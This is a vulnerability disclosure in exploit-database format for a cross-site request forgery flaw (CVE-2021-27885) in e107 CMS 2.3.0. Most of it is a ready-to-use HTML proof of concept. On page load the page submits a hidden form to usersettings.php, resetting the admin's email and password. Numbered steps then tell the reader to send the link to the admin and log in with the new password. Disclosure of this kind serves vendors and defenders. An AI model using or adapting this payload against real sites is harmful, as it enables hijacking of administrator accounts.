# Exploit Title: e107 CMS 2.3.0 - CSRF # Date: 04/03/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://e107.org # Software Link: https://e107.org/download # Version: 2.3.0 # Tested on: Windows 10 # CVE : CVE-2021-27885 CSRF vulnerability on e107 CMS ## Bug Description Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link. ## How to Reproduce Steps to reproduce the behavior: 1. Create a CSRF login POC using the following code. ``` <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Cross Site Request Forgery (Edit Existing Admin details)</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>Cross Site Request Forgery (Edit Existing Admin details)</H2> <form method="POST" name="form0" action=" http://localhost/[path-to-e107-cms]/usersettings.php"> <input type="hidden" name="loginname" value="admin"/> <input type="hidden" name="email" value="[email]"/> <input type="hidden" name="password1" value="[password]"/> <input type="hidden" name="password2" value="[password]"/> <input type="hidden" name="hideemail" value="1"/> <input type="hidden" name="image" value=""/> <input type="hidden" name="signature" value=""/> <input type="hidden" name="updatesettings" value="Save settings"/> <input type="hidden" name="_uid" value="2"/> </form> </body> </html> ``` 2. Replace the email and password with the valid credentials. 3. Send the link script to the victim (admin) to make them click. 4. Login with new admin password